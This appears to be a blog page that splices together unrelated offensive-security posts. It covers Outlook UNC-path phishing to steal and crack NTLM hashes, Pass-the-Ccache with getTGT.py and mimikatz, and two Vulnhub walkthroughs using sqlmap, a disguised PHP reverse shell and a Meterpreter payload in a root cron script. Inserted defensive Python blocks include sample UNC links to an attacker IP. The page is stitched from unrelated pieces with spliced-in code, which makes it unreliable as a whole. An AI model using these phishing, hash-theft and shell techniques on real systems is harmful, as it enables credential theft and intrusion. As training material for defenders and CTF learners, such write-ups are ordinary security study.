Abusing Microsoft Outlook 365 to Capture NTLM

In this post we will discuss how an attacker uses Microsoft Office in a phishing attack to obtain NTLM hashes from Windows. Since we all know that Microsoft Office applications like Word, PowerPoint, Excel and Outlook are the most relied-upon tools in any organization, an attacker takes advantage of this reliance to deceive the user.

Here we try to explain the different approach an attacker uses in a phishing attack to capture Microsoft Windows NTLM hashes.

In fact, the attacker uses the UNC path injection technique to capture the Windows NTLM hashes and relies on phishing to achieve this goal.

Table of Content

  • Link UNC Path in an Image
  • Link UNC PATH in a Text File
  • Link UNC PATH Word Document

Walkthrough

Here we are using Kali Linux with the IP address 192.168.1.112; this IP will be used in the UNC path.

Link UNC Path in an Image

Objective 1: Send a phishing mail to the target user that contains a malicious image.

Use Office 365 to link a UNC path within an image: insert an image and draft a mail for your victim to deceive him/her.

Inject the UNC path by adding a hyperlink to the image as shown below. Nowadays attackers use COVID-19 precaution images to carry out large-scale phishing attacks.

We used our Kali Linux IP here to steal the NTLM hashes. On the Pyramid of Pain this could be considered an easy phase for a threat hunter hunting for IOCs, although here the attacker's malicious domain address or an IP address in dword format may be used to evade the intrusion detection system.

Once you have drafted your message using Office 365, install Responder on your Kali Linux to capture the NTLM hashes.

Responder is an LLMNR, NBT-NS and MDNS poisoner with built-in HTTP/SMB/MSSQL/FTP/LDAP rogue authentication servers supporting NTLMv1/NTLMv2/LMv2, Extended Security NTLMSSP and Basic HTTP authentication.

Run the given command, and right after starting Responder send the mail to the victim.

Now, when the victim opens the mail and clicks on the image, opens it in a new tab or saves the image, his/her NTLM hashes are stolen without his/her knowledge.

As a result the attacker obtains the NTLM hashes of the victim's machine as shown in the image given below. Here you can observe that it has given the NetBIOS username along with the hashes.

An attacker may use John the Ripper or other NTLM hash cracking tools to retrieve the password. As you can see here, we used the NTLM hash file generated by Responder to extract the victim's password with the help of John the Ripper.

Link UNC PATH in a Text File

Objective 2: Send a phishing mail to the target user that contains an object.

Up to Office 2013 it was possible to send a malicious attachment by injecting a UNC path, but after Office 2013 the "link to file" option is disabled, which prevents an attacker from carrying out a phishing attack via a malicious attachment.

Yet the attacker can still find a second alternative for delivering a malicious attachment: instead of sending an attachment, they link an object in the mail.

Here we have added a text file as an object; here we cannot use the "link to file" feature for injecting the UNC path.

Once you have added the object, inject the hyperlink for the UNC path as done above, i.e. \\192.168.1.112, and mail it to the victim. Meanwhile, run Responder to steal the NTLM hashes as done above.

Now when the victim opens the mail and clicks on the text or opens it in a new tab, his/her NTLM hashes are stolen without his/her knowledge.

As a result the attacker obtains the NTLM hashes of the victim's machine as shown in the image given below. Here you can observe that it has given the NetBIOS username along with the hashes.

Link UNC PATH Word Document

Objective 3: Send a phishing mail to the target user that contains a Word document attachment.

In most scenarios the attacker uses a Word document to make the email appear authentic, so he injects the UNC path inside the document file by hyperlinking the file inside it. But as we mentioned, Outlook removed the "link to file" / "insert as a link" option to prevent attackers from sending malicious documents.

There is an alternative technique that allows an attacker to inject the UNC path into the attachment. We have written HTML code in a text file containing the UNC path link in the img src attribute, as shown in the HTML image.

Now open a Word document and link the HTML file as an object; for this we go to "Insert > Object > Text from File".

Now insert the HTML file and select the option "Insert as Link" as shown in the image.

Now send the Word document that contains the link to the HTML file as an attachment, mail it to the victim, and wait for the victim to respond while Responder runs in the background.

Now, when the victim opens the mail and clicks on the text or opens it in a new tab, his/her NTLM hashes are stolen without his/her knowledge.

As a result the attacker obtains the NTLM hashes of the victim's machine as shown in the image given below. Here you can observe that it has given the NetBIOS username along with the hashes.

Conclusion: We saw how the attacker cleverly injected the UNC path into an image, a text file or a Word document and deceived the victim by sending a phishing mail.
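As an added defensive example (not from the original post): a mail-gateway style check in Python that scans an HTML message body for hyperlinks or image sources pointing at UNC paths or file:// URLs, the injection used in all three variants above, and normalises a dword-form host back to a dotted IP so the indicator can still be matched. The sample message body is constructed for the example.

```python
"""Flag links in an HTML mail body that would make Outlook/Windows authenticate outbound
over SMB/WebDAV: UNC paths (\\host\share), file:// URLs, and hosts written as a dword."""
from html.parser import HTMLParser
import re

UNC_RE = re.compile(r"^\\\\([^\\/]+)")                  # \\host\share...
FILE_URL_RE = re.compile(r"^file://([^/\\]+)", re.IGNORECASE)   # file://host/share (not file:///C:/)

def decode_host(host):
    """Normalise a UNC host: a purely decimal (dword) host becomes a dotted quad."""
    if host.isdigit() and int(host) < 2**32:
        n = int(host)
        return ".".join(str((n >> shift) & 0xFF) for shift in (24, 16, 8, 0))
    return host.lower()

class LinkCollector(HTMLParser):
    """Collect every href/src/background attribute value in the body, in document order."""
    def __init__(self):
        super().__init__()
        self.targets = []

    def handle_starttag(self, tag, attrs):
        for name, value in attrs:
            if name in ("href", "src", "background") and value:
                self.targets.append((tag, value.strip()))

def find_unc_links(html):
    """Return (tag, raw_value, normalised_host) for each link that would trigger an
    outbound SMB/WebDAV authentication when the user clicks, opens or saves it."""
    collector = LinkCollector()
    collector.feed(html)
    hits = []
    for tag, value in collector.targets:
        m = UNC_RE.match(value) or FILE_URL_RE.match(value)
        if m:
            hits.append((tag, value, decode_host(m.group(1))))
    return hits

# Constructed sample body: the hyperlinked image and the HTML img-src cases from the
# post, a dword-form host (3232235888 == 192.168.1.112), and one benign https link.
SAMPLE_MAIL = """
<p>COVID-19 precautions</p>
<a href="\\\\192.168.1.112\\share\\info.png"><img src="cid:image001.png"></a>
<img src="file://3232235888/pic/logo.jpg">
<a href="https://example.com/guidance">Read more</a>
"""

if __name__ == "__main__":
    for tag, raw, host in find_unc_links(SAMPLE_MAIL):
        print(f"<{tag}> {raw} -> authenticates to {host}")
```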

Lateral Movement: Pass the Cache

In this post we discuss how an attacker uses the ccache file to subvert Kerberos authentication and access an application server without using a password. This attack is known as Pass the Ccache (PtC).

Table of Content

  • Credential Cache
  • Ccache Types
  • Walkthrough Pass the Ccache attack
    • Method 1: Mimikatz
    • Method 2: KRB5CCNAME

Credential Cache

A credential cache (or "ccache") holds Kerberos credentials while they remain valid and, typically, while the user's session lasts, so that authenticating to a service multiple times (e.g. connecting to a web or mail server more than once) does not require contacting the KDC every time.

A credential cache usually contains one initial ticket which is obtained using a password or another form of identity verification. If this ticket is a ticket-granting ticket, it can be used to obtain additional credentials without the password. Because the credential cache does not store the password, less long-term damage can be done to the user's account if the machine is compromised.

A credential cache stores a default client principal name, set when the cache is created. This is the name shown at the top of the klist output.

Ccache Types

There are several kinds of credentials cache supported in the MIT Kerberos library. Not all are supported on every platform.

FILE caches: These are the simplest and most portable. A simple flat file format is used to store one credential after another. This is the default ccache type.

API: Only implemented on Windows. It communicates with a server process that holds the credentials in memory for the user, rather than writing them to disk.

DIR: Points to the storage location of a collection of credential caches in FILE: format. It is most useful when dealing with multiple Kerberos realms and KDCs.

KEYRING: It is Linux-specific, and uses the kernel keyring support to store credential data in unswappable kernel memory where only the current user should be able to access it.

MEMORY caches: These are for storage of credentials that don’t need to be made available outside of the current process. Memory ccaches are faster than file ccaches and are automatically destroyed when the process exits.

MSLSA: It is a Windows-specific cache type that accesses the Windows credential store.

Read more about the MIT Kerberos credential cache here: https://web.mit.edu/kerberos/krb5-1.12/doc/basic/ccache_def.html
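As an added example, not from the original post: a small Python parser for the FILE: ccache format (version 4) described above, the kind of check an incident responder runs on a ccache recovered from a compromised host to see whose tickets it holds and which of them is a TGT. The sample cache is constructed inline with dummy key and ticket bytes; it is not a real capture.

```python
"""Parse an MIT Kerberos FILE: credential cache (format version 4) to see whose tickets it holds."""
import struct
from datetime import datetime, timezone

def _enc(b): return struct.pack(">I", len(b)) + b          # ccache "data" item: uint32 len + bytes

def _enc_principal(name):      # "svc/host@REALM" -> v4 principal record, name type 1 (NT-PRINCIPAL)
    comps, realm = name.rsplit("@", 1)
    comps = comps.split("/")
    return struct.pack(">II", 1, len(comps)) + _enc(realm.encode()) + b"".join(_enc(c.encode()) for c in comps)

def _dec(buf, pos):            # inverse of _enc: returns (bytes, position after them)
    n = struct.unpack_from(">I", buf, pos)[0]
    return buf[pos + 4:pos + 4 + n], pos + 4 + n

def _dec_principal(buf, pos):
    _name_type, count = struct.unpack_from(">II", buf, pos)
    realm, pos = _dec(buf, pos + 8)
    comps = []
    for _ in range(count):
        comp, pos = _dec(buf, pos)
        comps.append(comp.decode())
    return "/".join(comps) + "@" + realm.decode(), pos

def parse_ccache(buf):
    """Return (default_principal, [credential dicts]) for a version-4 FILE ccache."""
    if buf[:2] != b"\x05\x04":
        raise ValueError("only ccache file format version 4 is handled here")
    pos = 4 + struct.unpack_from(">H", buf, 2)[0]           # skip the tagged header (DeltaTime)
    default, pos = _dec_principal(buf, pos)
    creds = []
    while pos < len(buf):                                  # credentials follow back to back
        client, pos = _dec_principal(buf, pos)
        server, pos = _dec_principal(buf, pos)
        _key, pos = _dec(buf, pos + 2)                      # uint16 enctype precedes the key
        _auth, _start, endtime, _renew = struct.unpack_from(">IIII", buf, pos)
        pos += 16 + 1 + 4                                   # four times, is_skey, ticket_flags
        for _ in range(2):                                  # address list, then authdata list
            count = struct.unpack_from(">I", buf, pos)[0]
            pos += 4
            for _ in range(count):
                _item, pos = _dec(buf, pos + 2)             # uint16 type, then data
        ticket, pos = _dec(buf, pos)
        _second, pos = _dec(buf, pos)
        creds.append({"client": client, "server": server, "ticket_len": len(ticket),
                      "expires": datetime.fromtimestamp(endtime, timezone.utc),
                      "is_tgt": server.startswith("krbtgt/")})
    return default, creds

def build_sample_ccache():     # constructed sample, not a real capture: a TGT plus one CIFS ticket
    hdr = struct.pack(">HHii", 1, 8, 0, 0)                  # DeltaTime header tag, zero offsets
    out = b"\x05\x04" + struct.pack(">H", len(hdr)) + hdr + _enc_principal("alice@CORP.LOCAL")
    for server in ("krbtgt/CORP.LOCAL@CORP.LOCAL", "cifs/fs01.corp.local@CORP.LOCAL"):
        out += _enc_principal("alice@CORP.LOCAL") + _enc_principal(server)
        out += struct.pack(">H", 18) + _enc(b"\x00" * 32)    # aes256-cts enctype, dummy key
        out += struct.pack(">IIIIBI", 1700000000, 1700000000, 1700036000, 1700600000, 0, 0x40E10000)
        out += struct.pack(">II", 0, 0)                      # no addresses, no authdata
        out += _enc(b"dummy-ticket") + _enc(b"")             # ticket, second_ticket
    return out
```

Run `parse_ccache(open(path, "rb").read())` on a real file to list its principal and tickets; a cache whose client principal differs from the logged-on user, or that contains a TGT the user never requested, is worth a closer look.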

Walkthrough Pass the Ccache attack

The Pass the Ccache attack uses the ticket-granting ticket to access the application server without going through Kerberos authentication. Here we store the Kerberos TGT in the form of a ccache file and use (pass) this ccache file to the application server's service.

Method 1: Mimikatz

Here we use the Impacket Python script getTGT.py which, given a password, hash or AES key, requests a TGT and saves it as a ccache file.

With the help of the above command you can request a Kerberos ticket in the form of a ccache, while with the help of the following command you can inject the ticket to access the resource.

Once you have the ccache, use mimikatz to pass the ccache file and try to access the resource; for this you need to execute the following commands:

privilege::debug

Note: Here we first generated the ccache and then used mimikatz, but you can also pull the ccache file from memory using klist -c, which lists all the ccaches stored in memory, and then use mimikatz to access the resource.

A new command prompt is then spawned, which is the CMD of the requested resource service. You can see how we accessed the resource without using the password or a ticket.kirbi file.

Method 2: KRB5CCNAME

Similarly, we used getTGT.py to generate the ccache and used KRB5CCNAME to pass the ccache file for the requested service. This is a completely remote attack that does not use the local system of the compromised victim, but you need to have compromised the NTLM hash for it. Type the following to conduct the Pass the Ccache attack remotely.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester. Can be Contacted on Twitter and LinkedIn

mhz_cxf: c1f Vulnhub Walkthrough

CTFs are a great way to sharpen your axe. As a security enthusiast, this is probably the best way to get some hands-on practice that lends perspective on how an adversary will exploit a vulnerability and how, as infosec professionals, we will eliminate that risk or guard against it.

This is a very engaging CTF; it has some aspects of steganography. It gives you the chance to turn those wheels but not so much that you get frustrated; think of it as somewhere between easy and intermediate level. You can download it from here.

Now, let’s dive in.

Penetration Testing Methodology

  • Network Discovery and Scanning
    • Using Netdiscover
    • Using Nmap
  • Enumeration
    • Directory Bruteforce using dirb
  • System Exploration
  • Data Exfiltration
    • Using SCP
  • Steganography
    • Using Steghide
  • Privilege Escalation

Network Scanning

We begin by scanning our network for the target machine using Netdiscover.

The target machine is active on 192.168.1.104. Let’s scan it and see which services are running and which ports are open.

We do an aggressive scan on the target using nmap.

The scan gives us a lot of good and useful information, but what stands out the most is that ports 22 and 80 are open. Let's explore port 80 first and see what we can find there.

This does not help much, time to move to the next stage.

Enumeration

Let's try to bruteforce the directory using dirb and see what we come across. We are using the -X flag to specify that we are looking for .txt files only.

It seems we have found something! Let's navigate to the link given above in our attacking machine's web browser and see what we find.

The maker of this CTF seems to be hinting that remb.txt and/or remb2.txt might hold some valuable information. Let's navigate to them.

This looks like a username and a password; I wonder where we will be able to use it?!

System Exploration

We did see that the victim machine has port 22 open, so let's try our luck with SSH; maybe these credentials will work.

We were successfully able to connect to the victim machine over SSH using "flagitifyoucan1234" as the password.

Moving around in the directories we find "user.txt", which gives us a clue about the privilege level. Looking further we find a directory named after the CTF machine that holds image files; this is the part where we see the potential for steganography.

The images need to be moved from the victim machine to the attacking machine so that they can be investigated further.

Data Exfiltration

There are many ways to exfiltrate data from a system, but considering that this is a Linux system, the chances of SCP already being installed on it are very high, so let's use that instead of unnecessarily installing a new application.

On our attacking machine we make a directory to copy the files into, enter that directory and then start SCP with the credentials that we found earlier, specifying that we want to import all the files in the "Paintings" directory.

On checking the contents of the “raj” folder, we see that our operation to exfiltrate data was successful, all the image files in the Paintings directory are now in the attacking machine, ready to be scrutinized.

Steganography

Steghide is the tool of choice here for obvious reasons. We need to find what information is hidden in these images.

On running Steghide on the image named "spinning the wool.jpeg", we are prompted for a passphrase, where we use the credentials that we found earlier. This reveals a text file named "remb2.txt". If you recall, we came across this particular file name in our earlier screenshots.

We open the file to reveal what looks to be more credentials, let’s see where they can be used.

Privilege Escalation

We go back to the terminal we have open on the victim machine and try to switch user to "mhz_c1f" with the password that we just found, and it works, we are in!

On checking the privilege level held by this account, we find it is part of the sudo group, so let's try to get a better foothold. We are now in the root directory and on checking its contents we find ".root.txt"; on opening it, we get our final flag!!

This concludes our walkthrough for mhz_cxf: c1f, we hope you enjoyed it and picked up a few useful pieces of information on the way.

CTFs are the best way to wrap your head around the concepts and thought flows required to be a penetration tester; they give you a chance to think critically and apply what you have learnt so far about hacking, in a safe environment.

As always, we at Hacking Articles will try to bring you the latest and greatest in the sphere of infosec.

Have fun and stay ethical.

About The Author

Abhimanyu Dev is a Certified Ethical Hacker, penetration tester, information security analyst and researcher. Connect with him here

CengBox: 1 Vulnhub Walkthrough

Today I am going to share a writeup for the boot2root challenge of the Vulnhub machine "CengBox:1". It was an easy Linux-based box which helped me learn many new things. The goal is to find the user and root flags.

Penetration Testing Methodology

  • Reconnaissance
    • Netdiscover
    • Nmap
    • Dirb
  • Exploitation
    • SQLmap
    • File Upload
  • Privilege Escalation
    • Pspy script
    • Meterpreter session
  • Capturing the flag

Walkthrough

Reconnaissance

Let's start recon for this machine using Netdiscover. It is used for identifying the IP addresses of the various machines in our network; it works like traceroute.

As we got our target IP address (192.168.1.106), next we use nmap for port scanning and further information gathering on the target host.

Since port 80 is open, let's explore the webpage on this IP address using a web browser.

We will also perform fuzzing to find the endpoints using the dirbuster tool with the big.txt wordlist, which can be found inside the /usr/share/wordlists directory.

We got some directories (uploads, masteradmin, etc.). After checking all the directories, we got an error page at the masteradmin/ endpoint.

We decided to fuzz http://192.168.1.106/masteradmin using the dirbuster tool, but this time with the extension filter, to find any PHP files that might be present in the masteradmin directory.

In the above image we can see that there are login.php and upload.php endpoints, so we can try to get a reverse shell via the upload functionality or try to bypass the login page using SQL injection. So let's explore these endpoints for further enumeration.

Landing on the login page, we see that we will have to bypass the authentication panel, i.e., both username and password.

Exploitation

Since we got a login page, we need to find the username and password to log in for further exploitation. Here I tried brute-forcing the parameters but it didn't work for me, so I chose to try my hand at SQL injection with the sqlmap tool. I ran it with the URL as the parameter and also used the forms, dbs and batch options.

Sqlmap works for a while and gives us the names of some databases. Out of the extracted databases, the one that interests us is cengbox. So we decide to enumerate it further.

We then dump the data of this database using the command given below:

Here we can see that there is a table named admin inside the database we were looking at. Looking further we found the credentials for masteradmin.

So the valid credentials for this login page are:

After logging in as masteradmin, we see that we have a file upload functionality.

At first I tried to upload php-reverse-shell.php from the available web shell directory to get a reverse shell on the target machine, but it told me that the extension is not allowed: I need to upload a CENG file.

So to bypass this upload filter I tried changing the extension of the same reverse shell PHP file as shown in the image below.

After renaming the shell we tried to upload the file again. This time I was successful in uploading it. Using a netcat listener we establish the connection and get the shell.

During our enumeration we found a user named cengover; we also got this user's credentials in the sqlmap dump above. Here we switch from www-data to cengover using the password we found, C3ng0v3R00t1!

After getting the shell, I looked around for the user flag.

Privilege Escalation

Now moving towards the root flag, we need to check the permissions and look for hidden processes running on the machine. To find the hidden processes we need to download the pspy script to the remote machine; we will use the wget command for that.

Now we need to set the proper permissions. After that, we execute the script.

Below are some hidden processes we found; one of them runs the Python script md5check.py. Let's check the permissions on this file.

Here we can see that md5check.py has read and write permissions.

Now, using msfconsole, we make an executable shell and create a session to gain access through Meterpreter; the Meterpreter session appears only once the payload connects back. It gives full access to the target machine.

Edit the md5check.py file, insert the generated payload into it and save the file.

This gave us shell access in the Meterpreter session created before.
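As an added defensive check, not part of this walkthrough: the privilege escalation above works because a script that root runs on a schedule is writable by other users. The Python audit below parses system-crontab lines, pulls out the script paths each job runs and reports those that group or world can modify. The crontab text and the files it points at are constructed in a temporary directory for the example; on a real host you would feed it /etc/crontab and the files under /etc/cron.d.

```python
"""Audit system crontab entries for scripts that non-owners can modify (the md5check.py
class of misconfiguration): a root-run script writable by others is a root shell waiting."""
import os
import re
import stat
import tempfile

# system crontab line: five time fields (or an @alias), then the user, then the command
CRON_LINE = re.compile(r"^\s*(?:@\w+\s+|(?:\S+\s+){5})(?P<user>\S+)\s+(?P<cmd>.+)$")

def script_paths(cmd):
    """Pick the absolute paths out of a cron command line, interpreter arguments included."""
    return [tok for tok in cmd.split() if tok.startswith("/")]

def writable_by_others(path):
    """True if the group or world write bit is set on the file."""
    return bool(os.stat(path).st_mode & (stat.S_IWGRP | stat.S_IWOTH))

def audit_crontab(text, is_risky=writable_by_others):
    """Return [(user, path)] for entries whose script a non-owner could rewrite.
    Only existing regular files are checked; a writable parent directory (which would
    allow replacing the file) is out of scope for this example."""
    findings = []
    for line in text.splitlines():
        if line.lstrip().startswith("#"):
            continue
        m = CRON_LINE.match(line)
        if not m:
            continue                       # comments, environment settings, blank lines
        for path in script_paths(m.group("cmd")):
            if os.path.isfile(path) and is_risky(path):
                findings.append((m.group("user"), path))
    return findings

def demo():
    """Constructed demo: a world-writable script scheduled under root, next to a safe one."""
    with tempfile.TemporaryDirectory() as tmp:
        bad = os.path.join(tmp, "md5check.py")
        good = os.path.join(tmp, "backup.sh")
        for p in (bad, good):
            open(p, "w").close()
        os.chmod(bad, 0o666)               # the mistake: anyone may rewrite a script root will run
        os.chmod(good, 0o644)
        crontab = (f"SHELL=/bin/sh\n"
                   f"* * * * * root /usr/bin/python3 {bad}\n"
                   f"0 2 * * * root {good}\n")
        return [os.path.basename(p) for _, p in audit_crontab(crontab)]

if __name__ == "__main__":
    print("writable scheduled scripts:", demo())
```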

Here we got our root flag. Happy Hacking! See you next time.

Author: Sushma Ahuja is a Technical Writer, Researcher, and Penetration Tester. Can be Contacted on LinkedIn